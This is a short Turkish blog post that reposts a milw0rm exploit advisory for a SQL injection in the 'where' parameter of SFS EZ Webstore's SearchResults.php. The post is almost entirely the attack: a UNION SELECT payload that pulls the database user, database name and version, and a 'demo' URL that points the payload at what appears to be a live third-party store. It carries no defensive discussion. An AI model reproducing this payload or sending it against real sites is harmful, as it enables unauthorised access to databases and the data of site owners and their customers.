SFS EZ Webstore (where) Remote SQL Injection Vulnerability

1 Kasım 2008 Cumartesi

SFS EZ Webstore (where) Remote SQL Injection Vulnerability

SFS EZ Webstore (where) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/6922

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]

[SQL]=

ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

demo

http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

ZoRLu | ZRL | Buffer Overflow

1 Kasım 2008 Cumartesi

SFS EZ Webstore (where) Remote SQL Injection Vulnerability

0 yorum:

About Me

Blog Archive

İzleyiciler

Bağlantılarım

Inj3ct0r.com